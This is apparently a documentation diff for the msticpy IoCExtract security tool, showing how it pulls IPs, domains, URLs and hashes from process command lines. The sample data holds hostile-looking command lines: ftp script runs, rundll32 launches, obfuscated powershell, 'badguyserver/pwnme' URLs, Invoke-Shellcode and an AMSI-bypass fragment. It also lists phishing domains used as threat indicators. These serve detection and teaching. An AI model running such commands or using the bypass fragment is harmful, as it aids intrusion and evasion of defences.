+.. code:: ipython3
+
+    nbdisplay.display_timeline(data=clus_logons,
+                               group_by="Account",
+                               source_columns=['Account', 'LogonType'],
+                               title='Clustered Host Logons',
+                               legend="right",
+                               yaxis=True)
+
+
+
+.. image:: _static/EventClustering_7.png
+
+
+.. code:: ipython3
+
+    # Counts of Logon types by Account
+    host_logons[['Account', 'LogonType', 'TimeGenerated']].groupby(['Account','LogonType']).count()
+
+
++--------------------------------+------------+----------------+
+| Account                        | LogonType  | TimeGenerated  |
++================================+============+================+
+| MSTICAlertsWin1\MSTICAdmin     | 4          | 2              |
++--------------------------------+------------+----------------+
+| MSTICAlertsWin1\adm1nistrator  | 3          | 1              |
++--------------------------------+------------+----------------+
+| NT AUTHORITY\SYSTEM            | 5          | 11             |
++--------------------------------+------------+----------------+
diff --git a/docs/source/data_analysis/IoCExtract.rst b/docs/source/data_analysis/IoCExtract.rst
new file mode 100644
index 000000000..2421f87b4
--- /dev/null
+++ b/docs/source/data_analysis/IoCExtract.rst
@@ -0,0 +1,739 @@
+IoC Extraction
+==============
+
+
+This class allows you to extract IoC patterns from a string or a
+DataFrame. Several patterns are built in to the class and you can
+override these or supply new ones.
+
+
+.. code:: ipython3
+
+    # Imports
+    import sys
+    MIN_REQ_PYTHON = (3,6)
+    if sys.version_info < MIN_REQ_PYTHON:
+        print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')
+        print('or later is selected as the active kernel.')
+        sys.exit("Python %s.%s or later is required.\n" % MIN_REQ_PYTHON)
+
+    from IPython.display import display, HTML
+    import matplotlib.pyplot as plt
+    import seaborn as sns
+    sns.set()
+    import pandas as pd
+    pd.set_option('display.max_rows', 500)
+    pd.set_option('display.max_columns', 50)
+    pd.set_option('display.max_colwidth', 100)
+
+.. code:: ipython3
+
+    # Load test data
+    process_tree = pd.read_csv('data/process_tree.csv')
+    process_tree[['CommandLine']].head()
+
+
+
+
+.. raw:: html
+
+    <div>
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>CommandLine</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>0</th>
+          <td>.\ftp  -s:C:\RECYCLER\xxppyy.exe</td>
+        </tr>
+        <tr>
+          <th>1</th>
+          <td>.\reg  not /domain:everything that /sid:shines is /krbtgt:golden !</td>
+        </tr>
+        <tr>
+          <th>2</th>
+          <td>cmd  /c "systeminfo &amp;&amp; systeminfo"</td>
+        </tr>
+        <tr>
+          <th>3</th>
+          <td>.\rundll32  /C 42424.exe</td>
+        </tr>
+        <tr>
+          <th>4</th>
+          <td>.\rundll32  /C c:\users\MSTICAdmin\42424.exe</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+    <br/>
+
+
+
+
+Looking for IoC in a String
+---------------------------
+
+Just pass the string as a parameter to the extract() method.
+
+
+Get a commandline from our data set.
+
+.. code:: ipython3
+
+    # get a commandline from our data set
+    cmdline = process_tree['CommandLine'].loc[78]
+    cmdline
+
+
+
+
+.. parsed-literal::
+
+    'netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\bzzzzzz.txt'
+
+
+Instantiate an IoCExtract instance and pass the string to the extract() method.
+
+.. code:: ipython3
+
+    # Instantiate an IoCExtract object
+    from msticpy.sectools import IoCExtract
+    ioc_extractor = IoCExtract()
+
+    # any IoCs in the string?
+    iocs_found = ioc_extractor.extract(cmdline)
+
+    if iocs_found:
+        print('\nPotential IoCs found in alert process:')
+        display(iocs_found)
+
+
+
+.. parsed-literal::
+
+
+    Potential IoCs found in alert process:
+
+
+
+.. parsed-literal::
+
+    defaultdict(set,
+                {'ipv4': {'1.2.3.4'},
+                 'windows_path': {'C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\bzzzzzz.txt'}})
+
+
+The following IoC patterns are searched for:
+
+* ipv4
+* ipv6
+* dns
+* url
+* windows_path
+* linux_path
+* md5_hash
+* sha1_hash
+* sha256_hash
+
+
+Using a DataFrame as Input
+--------------------------
+
+You can use the ``data=`` parameter to
+IoCExtract.extract() to pass a DataFrame. Use the ``columns``
+parameter to specify which column or columns that you want to search.
+
+.. note:: When searching a DataFrame
+    the following types are not included in the search by default
+    ``windows_path`` and ``linux_path`` because of the likely high volume
+    of results and number of false positive matches. You can
+    include them by specifing ``include_paths=True`` as a parameter to
+    ``extract()``.
+
+    You can also use the ``ioc_types`` parameter to explicitly list the
+    ioc_types that you want to search for. This should be a list of
+    strings of valid types.
+    See :py:meth:`ioc_types<msticpy.sectools.ioc_extractor.IoCExtract.ioc_types>`
+
+
+.. code:: ipython3
+
+    ioc_extractor = IoCExtract()
+    ioc_df = ioc_extractor.extract(data=process_tree, columns=['CommandLine'])
+    if len(ioc_df):
+        display(HTML("<h3>IoC patterns found in process tree.</h3>"))
+        display(ioc_df)
+
+
+
+.. raw:: html
+
+    <h3>IoC patterns found in process tree.</h3>
+
+
+
+.. raw:: html
+
+    <div>
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>IoCType</th>
+          <th>Observable</th>
+          <th>SourceIndex</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>48</th>
+          <td>windows_path</td>
+          <td>.\powershell</td>
+          <td>36</td>
+        </tr>
+        <tr>
+          <th>49</th>
+          <td>url</td>
+          <td>http://somedomain/best-kitten-names-1.jpg'</td>
+          <td>37</td>
+        </tr>
+        <tr>
+          <th>53</th>
+          <td>windows_path</td>
+          <td>.\pOWErS^H^ElL^.eX^e^</td>
+          <td>37</td>
+        </tr>
+        <tr>
+          <th>58</th>
+          <td>md5_hash</td>
+          <td>81ed03caf6901e444c72ac67d192fb9c</td>
+          <td>44</td>
+        </tr>
+        <tr>
+          <th>59</th>
+          <td>url</td>
+          <td>http://badguyserver/pwnme"</td>
+          <td>46</td>
+        </tr>
+        <tr>
+          <th>68</th>
+          <td>windows_path</td>
+          <td>.\reg  query add mscfile\\\\open</td>
+          <td>59</td>
+        </tr>
+        <tr>
+          <th>72</th>
+          <td>windows_path</td>
+          <td>\system\CurrentControlSet\Control\Terminal</td>
+          <td>63</td>
+        </tr>
+        <tr>
+          <th>92</th>
+          <td>ipv4</td>
+          <td>1.2.3.4</td>
+          <td>78</td>
+        </tr>
+        <tr>
+          <th>108</th>
+          <td>ipv4</td>
+          <td>127.0.0.1</td>
+          <td>102</td>
+        </tr>
+        <tr>
+          <th>109</th>
+          <td>url</td>
+          <td>http://127.0.0.1/</td>
+          <td>102</td>
+        </tr>
+        <tr>
+          <th>110</th>
+          <td>windows_path</td>
+          <td>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\MyNastySvcHostConfig</td>
+          <td>103</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+    <br/>
+
+
+IoCExtractor API
+----------------
+
+See :py:class:`IoCExtract<msticpy.sectools.ioc_extractor.IoCExtract>`
+and See :py:func:`IoCExtract<msticpy.sectools.ioc_extractor.IoCExtract.extract>`
+
+
+Predefined Regex Patterns
+-------------------------
+
+.. code:: ipython3
+
+    from html import escape
+    extractor = IoCExtract()
+
+    for ioc_type, pattern in extractor.ioc_types.items():
+        esc_pattern = escape(pattern.comp_regex.pattern)
+        display(HTML(f'<b>{ioc_type}</b>'))
+        display(HTML(f'<div style="margin-left:20px"><pre>{esc_pattern}</pre></div>)'))
+
+
+
+.. raw:: html
+
+    <table border="1">
+      <thead>
+        <tr style="text-align: right;">
+          <th>IoCType</th>
+          <th>Regex</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <td>ipv4</td>
+          <td><pre>(?P&lt;ipaddress&gt;(?:[0-9]{1,3}\\.){3}[0-9]{1,3})</pre></td>
+        </tr>
+        <tr>
+          <td>ipv6</td>
+          <td><pre>(?&lt;![:.\\w])(?:[A-F0-9]{1,4}:){7}[A-F0-9]{1,4}(?![:.\\w])</pre></td>
+        </tr>
+        <tr>
+          <td>dns</td>
+          <td><pre>((?=[a-z0-9-]{1,63}\\.)[a-z0-9]+(-[a-z0-9]+)*\\.){2,}[a-z]{2,63}</pre></td>
+        </tr>
+        <tr>
+          <td>url</td>
+          <td>
+            <pre>(?P&lt;protocol&gt;(https?|ftp|telnet|ldap|file)://)&#10;</pre>
+            <pre>(?P&lt;userinfo&gt;([a-z0-9-._~!$&amp;\\'()*+,;=:]|%[0-9A-F]{2})*@)?&#10;</pre>
+            <pre>(?P&lt;host&gt;([a-z0-9-._~!$&amp;\\'()*+,;=]|%[0-9A-F]{2})*)</pre>
+          </td>
+        </tr>
+        <tr>
+          <td>windows_path</td>
+          <td>
+            <pre>&#13;&#10;(?P&lt;root&gt;[a-z]:|\\\\\\\\[a-z0-9_.$-]+||[.]+)&#10;</pre>
+            <pre>(?P&lt;folder&gt;\\\\(?:[^\\/:*?&quot;\\\'&lt;&gt;|\\r\\n]+\\\\)*)&#10;></pre>
+            <pre>(?P&lt;file&gt;[^\\\\/*?&quot;&quot;&lt;&gt;|\\r\\n ]+)</pre>
+          </td>
+        </tr>
+        <tr>
+          <td>linux_path</td>
+          <td>
+            <pre>(?P&lt;root&gt;/+||[.]+)&#10;</pre>
+            <pre>(?P&lt;folder&gt;/(?:[^\\\\/:*?&lt;&gt;|\\r\\n]+/)*)&#10;</pre>
+            <pre>(?P&lt;file&gt;[^/\\0&lt;&gt;|\\r\\n ]+)</pre>
+          </td>
+        <tr>
+          <td>md5_hash</td>
+          <td><pre>(?:^|[^A-Fa-f0-9])(?P&lt;hash&gt;[A-Fa-f0-9]{32})(?:$|[^A-Fa-f0-9])</pre></td>
+        </tr>
+        <tr>
+          <td>sha1_hash</td>
+          <td><pre>(?:^|[^A-Fa-f0-9])(?P&lt;hash&gt;[A-Fa-f0-9]{40})(?:$|[^A-Fa-f0-9])</pre></td>
+        </tr>
+          <tr>
+          <td>ipv6</td>
+          <td><pre>(?:^|[^A-Fa-f0-9])(?P&lt;hash&gt;[A-Fa-f0-9]{64})(?:$|[^A-Fa-f0-9])</pre></td>
+        </tr>
+      </table>
+      <br>
+
+
+
+Adding your own pattern(s)
+--------------------------
+
+
+See :py:func:`add_ioc_type<msticpy.sectools.ioc_extractor.IoCExtract.add_ioc_type>`
+
+
+Add an IoC type and regular expression to use to the built-in set.
+
+.. warning:: Adding an ioc_type that exists in the internal set will overwrite that item
+
+Regular expressions are compiled with re.I | re.X | re.M (Ignore case, Verbose
+and MultiLine)
+
+add_ioc_type parameters:
+
+-  ioc_type{str} - a unique name for the IoC type
+-  ioc_regex{str} - a regular expression used to search for the type
+
+
+.. code:: ipython3
+
+    import re
+    rcomp = re.compile(r'(?P<pipe>\\\\\.\\pipe\\[^\s\\]+)')
+
+.. code:: ipython3
+
+    extractor.add_ioc_type(ioc_type='win_named_pipe', ioc_regex=r'(?P<pipe>\\\\\.\\pipe\\[^\s\\]+)')
+
+    # Check that it added ok
+    print(extractor.ioc_types['win_named_pipe'])
+
+    # Use it in our data set
+    ioc_extractor.extract(data=process_tree, columns=['CommandLine']).query('IoCType == \'win_named_pipe\'')
+
+
+.. parsed-literal::
+
+    IoCPattern(ioc_type='win_named_pipe', comp_regex=re.compile('(?P<pipe>\\\\\\\\\\.\\\\pipe\\\\[^\\s\\\\]+)', re.IGNORECASE|re.MULTILINE|re.VERBOSE), priority=0)
+
+
+
+
+.. raw:: html
+
+    <div>
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>IoCType</th>
+          <th>Observable</th>
+          <th>SourceIndex</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>116</th>
+          <td>win_named_pipe</td>
+          <td>\\.\pipe\blahtest"</td>
+          <td>107</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+    <br>
+
+extract_df()
+~~~~~~~~~~~~
+
+``extract_df`` functions identically to ``extract`` with a ``data``
+parameter. It may be more convenient to use this when you know that your
+input is a DataFrame
+
+.. code:: ipython3
+
+    ioc_extractor.extract_df(process_tree, columns=['NewProcessName', 'CommandLine']).head(10)
+
+
+
+
+
+
+Merging output with source data
+-------------------------------
+
+The SourceIndex column allows you to merge the
+results with the input DataFrame Where an input row has multiple IoC
+matches the output of this merge will result in duplicate rows from the
+input (one per IoC match). The previous index is preserved in the second
+column (and in the SourceIndex column).
+
+Note: you will need to set the type of the SourceIndex column. In the
+example below case we are matching with the default numeric index so we
+force the type to be numeric. In cases where you are using an index of a
+different dtype you will need to convert the SourceIndex (dtype=object)
+to match the type of your index column.
+
+.. code:: ipython3
+
+    input_df = data=process_tree.head(20)
+    output_df = ioc_extractor.extract(data=input_df, columns=['NewProcessName', 'CommandLine'])
+    # set the type of the SourceIndex column. In this case we are matching with the default numeric index.
+    output_df['SourceIndex'] = pd.to_numeric(output_df['SourceIndex'])
+    merged_df = pd.merge(left=input_df, right=output_df, how='outer', left_index=True, right_on='SourceIndex')
+    merged_df.head()
+
+
+
+====  ====================================  ==========================  =========  =======================  ===============  ============================================  =================  ===================  ================  ==============  ===================================  ====================  ===========  ==================================================================  ===========================  ===============  ====================================  =======================  ==========  =======  ============  ===============  =========  ============  =============
+  ..  TenantId                              Account                       EventID  TimeGenerated            Computer         SubjectUserSid                                SubjectUserName    SubjectDomainName    SubjectLogonId    NewProcessId    NewProcessName                       TokenElevationType    ProcessId    CommandLine                                                         ParentProcessName            TargetLogonId    SourceComputerId                      TimeCreatedUtc           NodeRole      Level    ProcessId1    NewProcessId1    IoCType    Observable    SourceIndex
+====  ====================================  ==========================  =========  =======================  ===============  ============================================  =================  ===================  ================  ==============  ===================================  ====================  ===========  ==================================================================  ===========================  ===============  ====================================  =======================  ==========  =======  ============  ===============  =========  ============  =============
+   0  802d39e1-9d70-404d-832c-2de5e2478eda  MSTICAlertsWin1\MSTICAdmin       4688  2019-01-15 05:15:15.677  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500  MSTICAdmin         MSTICAlertsWin1      0xfaac27          0x1580          C:\Diagnostics\UserTmp\ftp.exe       %%1936                0xbc8        .\ftp  -s:C:\RECYCLER\xxppyy.exe                                    C:\Windows\System32\cmd.exe  0x0              46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:15.677  source            0           nan              nan        nan           nan              0
+   1  802d39e1-9d70-404d-832c-2de5e2478eda  MSTICAlertsWin1\MSTICAdmin       4688  2019-01-15 05:15:16.167  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500  MSTICAdmin         MSTICAlertsWin1      0xfaac27          0x16fc          C:\Diagnostics\UserTmp\reg.exe       %%1936                0xbc8        .\reg  not /domain:everything that /sid:shines is /krbtgt:golden !  C:\Windows\System32\cmd.exe  0x0              46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:16.167  sibling           1           nan              nan        nan           nan              1
+   2  802d39e1-9d70-404d-832c-2de5e2478eda  MSTICAlertsWin1\MSTICAdmin       4688  2019-01-15 05:15:16.277  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500  MSTICAdmin         MSTICAlertsWin1      0xfaac27          0x1700          C:\Diagnostics\UserTmp\cmd.exe       %%1936                0xbc8        cmd  /c "systeminfo && systeminfo"                                  C:\Windows\System32\cmd.exe  0x0              46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:16.277  sibling           1           nan              nan        nan           nan              2
+   3  802d39e1-9d70-404d-832c-2de5e2478eda  MSTICAlertsWin1\MSTICAdmin       4688  2019-01-15 05:15:16.340  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500  MSTICAdmin         MSTICAlertsWin1      0xfaac27          0x1728          C:\Diagnostics\UserTmp\rundll32.exe  %%1936                0xbc8        .\rundll32  /C 42424.exe                                            C:\Windows\System32\cmd.exe  0x0              46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:16.340  sibling           1           nan              nan        nan           nan              3
+   4  802d39e1-9d70-404d-832c-2de5e2478eda  MSTICAlertsWin1\MSTICAdmin       4688  2019-01-15 05:15:16.400  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500  MSTICAdmin         MSTICAlertsWin1      0xfaac27          0x175c          C:\Diagnostics\UserTmp\rundll32.exe  %%1936                0xbc8        .\rundll32  /C c:\users\MSTICAdmin\42424.exe                        C:\Windows\System32\cmd.exe  0x0              46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:16.400  sibling           1           nan              nan        nan           nan              4
+====  ====================================  ==========================  =========  =======================  ===============  ============================================  =================  ===================  ================  ==============  ===================================  ====================  ===========  ==================================================================  ===========================  ===============  ====================================  =======================  ==========  =======  ============  ===============  =========  ============  =============
+
+
+
+IPython magic
+-------------
+
+You can use the line magic ``%ioc`` or cell magic ``%%ioc`` to extract
+IoCs from text pasted directly into a cell
+
+The ioc magic supports the following options:
+
+::
+
+   --out OUT, -o OUT
+       The variable to return the results in the variable `OUT`
+       Note: the output variable is a dictionary iocs grouped by IoC Type
+   --ioc_types IOC_TYPES, -i IOC_TYPES
+       The types of IoC to search for (comma-separated string)
+
+.. code:: ipython3
+
+    %%ioc --out ioc_capture
+    netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\Users\user\AppData\Local\Temp\bzzzzzz.txt
+    hostname	customers-service.ddns.net		Feb 5, 2020, 2:20:35 PM		7
+    URL	\https://two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password		Feb 5, 2020, 2:20:35 PM		1
+    hostname	mobile.phonechallenges-submit.site		Feb 5, 2020, 2:20:35 PM		8
+    hostname	youtube.service-activity-checkup.site		Feb 5, 2020, 2:20:35 PM		8
+    hostname	www.drive-accounts.com		Feb 5, 2020, 2:20:35 PM		7
+    hostname	google.drive-accounts.com		Feb 5, 2020, 2:20:35 PM		7
+    domain	niaconucil.org		Feb 5, 2020, 2:20:35 PM		11
+    domain	isis-online.net		Feb 5, 2020, 2:20:35 PM		11
+    domain	bahaius.info		Feb 5, 2020, 2:20:35 PM		11
+    domain	w3-schools.org		Feb 5, 2020, 2:20:35 PM		12
+    domain	system-services.site		Feb 5, 2020, 2:20:35 PM		11
+    domain	accounts-drive.com		Feb 5, 2020, 2:20:35 PM		8
+    domain	drive-accounts.com		Feb 5, 2020, 2:20:35 PM		10
+    domain	service-issues.site		Feb 5, 2020, 2:20:35 PM		8
+    domain	two-step-checkup.site		Feb 5, 2020, 2:20:35 PM		8
+    domain	customers-activities.site		Feb 5, 2020, 2:20:35 PM		11
+    domain	seisolarpros.org		Feb 5, 2020, 2:20:35 PM		11
+    domain	yah00.site		Feb 5, 2020, 2:20:35 PM		4
+    domain	skynevvs.com		Feb 5, 2020, 2:20:35 PM		11
+    domain	recovery-options.site		Feb 5, 2020, 2:20:35 PM		4
+    domain	malcolmrifkind.site		Feb 5, 2020, 2:20:35 PM		8
+    domain	instagram-com.site		Feb 5, 2020, 2:20:35 PM		8
+    domain	leslettrespersanes.net		Feb 5, 2020, 2:20:35 PM		11
+    domain	software-updating-managers.site		Feb 5, 2020, 2:20:35 PM		8
+    domain	cpanel-services.site		Feb 5, 2020, 2:20:35 PM		8
+    domain	service-activity-checkup.site		Feb 5, 2020, 2:20:35 PM		7
+    domain	inztaqram.ga		Feb 5, 2020, 2:20:35 PM		8
+    domain	unirsd.com		Feb 5, 2020, 2:20:35 PM		8
+    domain	phonechallenges-submit.site		Feb 5, 2020, 2:20:35 PM		7
+    domain	acconut-verify.com		Feb 5, 2020, 2:20:35 PM		11
+    domain	finance-usbnc.info		Feb 5, 2020, 2:20:35 PM		8
+    FileHash-MD5	542128ab98bda5ea139b169200a50bce		Feb 5, 2020, 2:20:35 PM		3
+    FileHash-MD5	3d67ce57aab4f7f917cf87c724ed7dab		Feb 5, 2020, 2:20:35 PM		3
+    hostname	x09live-ix3b.account-profile-users.info		Feb 6, 2020, 2:56:07 PM		0
+    hostname	www.phonechallenges-submit.site		Feb 6, 2020, 2:56:07 PM
+
+
+
+
+.. parsed-literal::
+
+    [('ipv4', ['1.2.3.4']),
+     ('dns',
+      ['malcolmrifkind.site',
+       'w3-schools.org',
+       'niaconucil.org',
+       'software-updating-managers.site',
+       'isis-online.net',
+       'accounts-drive.com',
+       'cpanel-services.site',
+       'service-activity-checkup.site',
+       'service-issues.site',
+       'recovery-options.site',
+       'instagram-com.site',
+       'mobile.phonechallenges-submit.site',
+       'youtube.service-activity-checkup.site',
+       'google.drive-accounts.com',
+       'phonechallenges-submit.site',
+       'drive-accounts.com',
+       'www.phonechallenges-submit.site',
+       'yah00.site',
+       'seisolarpros.org',
+       'customers-activities.site',
+       'bahaius.info',
+       'system-services.site',
+       'two-step-checkup.site',
+       'x09live-ix3b.account-profile-users.info',
+       'customers-service.ddns.net',
+       'leslettrespersanes.net',
+       'www.drive-accounts.com',
+       'acconut-verify.com',
+       'finance-usbnc.info',
+       'unirsd.com',
+       'skynevvs.com',
+       'inztaqram.ga']),
+     ('url',
+      ['\https://two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password']),
+     ('windows_path', ['C:\\Users\\user\\AppData\\Local\\Temp\\bzzzzzz.txt']),
+     ('linux_path',
+      ['//two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password\t\tFeb']),
+     ('md5_hash',
+      ['3d67ce57aab4f7f917cf87c724ed7dab', '542128ab98bda5ea139b169200a50bce'])]
+
+
+.. code:: ipython3
+
+    %%ioc --ioc_types "ipv4, ipv6, linux_path, md5_hash"
+    netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\Users\user\AppData\Local\Temp\bzzzzzz.txt
+    tracefile2=/usr/localbzzzzzz.sh
+    hostname	customers-service.ddns.net		Feb 5, 2020, 2:20:35 PM		7
+    URL	\https://two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password		Feb 5, 2020, 2:20:35 PM		1
+    hostname	mobile.phonechallenges-submit.site		Feb 5, 2020, 2:20:35 PM		8
+    hostname	youtube.service-activity-checkup.site		Feb 5, 2020, 2:20:35 PM		8
+    hostname	www.drive-accounts.com		Feb 5, 2020, 2:20:35 PM		7
+    hostname	google.drive-accounts.com		Feb 5, 2020, 2:20:35 PM		7
+    domain	niaconucil.org		Feb 5, 2020, 2:20:35 PM		11
+    domain	isis-online.net		Feb 5, 2020, 2:20:35 PM		11
+    domain	bahaius.info		Feb 5, 2020, 2:20:35 PM		11
+    domain	w3-schools.org		Feb 5, 2020, 2:20:35 PM		12
+    domain	system-services.site		Feb 5, 2020, 2:20:35 PM		11
+    domain	accounts-drive.com		Feb 5, 2020, 2:20:35 PM		8
+    domain	drive-accounts.com		Feb 5, 2020, 2:20:35 PM		10
+    domain	service-issues.site		Feb 5, 2020, 2:20:35 PM		8
+    domain	two-step-checkup.site		Feb 5, 2020, 2:20:35 PM		8
+    domain	customers-activities.site		Feb 5, 2020, 2:20:35 PM		11
+    domain	seisolarpros.org		Feb 5, 2020, 2:20:35 PM		11
+    domain	yah00.site		Feb 5, 2020, 2:20:35 PM		4
+    domain	skynevvs.com		Feb 5, 2020, 2:20:35 PM		11
+    domain	recovery-options.site		Feb 5, 2020, 2:20:35 PM		4
+    domain	malcolmrifkind.site		Feb 5, 2020, 2:20:35 PM		8
+    domain	instagram-com.site		Feb 5, 2020, 2:20:35 PM		8
+    domain	leslettrespersanes.net		Feb 5, 2020, 2:20:35 PM		11
+    domain	software-updating-managers.site		Feb 5, 2020, 2:20:35 PM		8
+    domain	cpanel-services.site		Feb 5, 2020, 2:20:35 PM		8
+    domain	service-activity-checkup.site		Feb 5, 2020, 2:20:35 PM		7
+    domain	inztaqram.ga		Feb 5, 2020, 2:20:35 PM		8
+    domain	unirsd.com		Feb 5, 2020, 2:20:35 PM		8
+    domain	phonechallenges-submit.site		Feb 5, 2020, 2:20:35 PM		7
+    domain	acconut-verify.com		Feb 5, 2020, 2:20:35 PM		11
+    domain	finance-usbnc.info		Feb 5, 2020, 2:20:35 PM		8
+    FileHash-MD5	542128ab98bda5ea139b169200a50bce		Feb 5, 2020, 2:20:35 PM		3
+    FileHash-MD5	3d67ce57aab4f7f917cf87c724ed7dab		Feb 5, 2020, 2:20:35 PM		3
+    hostname	x09live-ix3b.account-profile-users.info		Feb 6, 2020, 2:56:07 PM		0
+    hostname	www.phonechallenges-submit.site		Feb 6, 2020, 2:56:07 PM
+
+
+
+
+.. parsed-literal::
+
+    [('ipv4', ['1.2.3.4']),
+     ('linux_path',
+      ['//two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password\t\tFeb',
+       '/usr/localbzzzzzz.sh']),
+     ('md5_hash',
+      ['3d67ce57aab4f7f917cf87c724ed7dab', '542128ab98bda5ea139b169200a50bce'])]
+
+
+
+
+Pandas Extension
+----------------
+
+The decoding functionality is also available in a pandas extension
+``mp_ioc``. This supports a single method ``extract()``.
+
+This supports the same syntax as ``extract`` (described earlier).
+
+.. code:: ipython3
+
+    process_tree.mp_ioc.extract(columns=['CommandLine'])
+
+
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+|     | IoCType         | Observable                                                                                           | SourceIndex  |
++=====+=================+======================================================================================================+==============+
+| 0   | dns             | microsoft.com                                                                                        | 24           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 1   | url             | \http://server/file.sct                                                                              | 31           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 2   | dns             | server                                                                                               | 31           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 3   | dns             | evil.ps                                                                                              | 35           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 4   | url             | \http://somedomain/best-kitten-names-1.jpg'                                                          | 37           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 5   | dns             | somedomain                                                                                           | 37           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 6   | dns             | blah.ps                                                                                              | 40           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 7   | md5_hash        | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa                                                                     | 40           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 8   | dns             | blah.ps                                                                                              | 41           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 9   | md5_hash        | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa                                                                     | 41           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 10  | md5_hash        | 81ed03caf6901e444c72ac67d192fb9c                                                                     | 44           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 11  | url             | \http://badguyserver/pwnme                                                                           | 46           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 12  | dns             | badguyserver                                                                                         | 46           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 13  | url             | \http://badguyserver/pwnme                                                                           | 47           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 14  | dns             | badguyserver                                                                                         | 47           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 15  | dns             | Invoke-Shellcode.ps                                                                                  | 48           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 16  | dns             | Invoke-ReverseDnsLookup.ps                                                                           | 49           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 17  | dns             | Wscript.Shell                                                                                        | 67           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 18  | url             | \http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').s...  | 77           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 19  | dns             | system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(...  | 77           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
